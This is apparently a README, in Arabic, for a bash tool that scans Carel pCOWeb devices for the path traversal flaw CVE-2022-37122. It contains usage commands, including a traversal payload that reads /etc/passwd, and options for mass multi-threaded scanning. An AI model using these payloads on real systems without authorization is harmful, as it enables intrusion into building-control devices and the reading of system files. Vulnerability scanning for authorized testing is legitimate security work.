
ماسح تجاوز المسار CVE-2022-37122
ماسح قوي وغني بالميزات لاكتشاف ثغرة اجتياز المسار logdownload.cgi في Carel pCOWeb (CVE-2022-37122). مصمم لباحثي الأمن والمختبرين الاختراق المصرح لهم.
للاستخدام التعليمي / برامج مكافآت الأخطاء فقط
هذه الأداة مخصصة لـ:
لا تستخدم هذه الأداة ضد أنظمة لا تملكها أو تفتقر إلى إذن كتابي صريح لاختبارها.
/etc/hostname (ملف غير حساس) للاختبار المسؤولbash (الإصدار 4.0+)curlfiglet (للبانر - يتم تثبيته تلقائيًا)git clone https://github.com/bughuntar/cve-2022-37122-scanner.git
cd cve-2022-37122-scanner
chmod +x cve-2022-37122-scanner.sh
./cve-2022-37122-scanner.sh -u http://target-ip
./cve-2022-37122-scanner.sh -f targets.txt -t 16 -o results.csv
./cve-2022-37122-scanner.sh \
-u https://device.local \
-p '../../../../../../../../etc/passwd' \
--insecure \
-v \
-t 20 \
-o detailed_findings.csv
يقوم الماسح بإنشاء ملف CSV بالأعمدة التالية:
host: مضيف URL الهدفurl: عنوان URL الاستغلال الكاملstatus: حالة الثغرة (VULNERABLE، POSSIBLE، NOT_DETECTED، ERROR)matched_pattern: النمط المطابق للكشفsample_file: مسار عينة الاستجابةيتم حفظ عينات الاستجابة في الدليل المحدد للتحقق اليدوي وجمع الأدلة.
يستخدم الماسح طرق كشف متعددة:
يقوم الماسح افتراضيًا بقراءة /etc/hostname والذي:
إذا كنت تستخدم حمولات مخصصة، تأكد من:
توضح هذه الأداة:
Professor the Hunter
المساهمات مرحب بها! يرجى:
هذه الأداة مقدمة للأغراض التعليمية والاختبار المصرح به فقط. المؤلف غير مسؤول عن أي سوء استخدام أو ضرر يسببه هذا البرنامج. احصل دائمًا على الإذن المناسب قبل إجراء اختبار الأمن.
| الخيار | الوصف | الافتراضي |
|---|
-u, --url URL | عنوان URL للهدف الفردي | - |
-f, --file FILE | ملف يحتوي على عناوين URL الأهداف | - |
-o, --output FILE | ملف الإخراج CSV | findings.csv |
-s, --samples-dir DIR | دليل عينات الاستجابة | samples |
-t, --threads N | عدد الخيوط المتزامنة | 8 |
-p, --payload STR | حمولة اجتياز المسار | /etc/hostname |
--insecure | تجاهل أخطاء شهادة SSL | - |
-v, --verbose | إخراج مفصل | - |
-h, --help | إظهار رسالة المساعدة | - |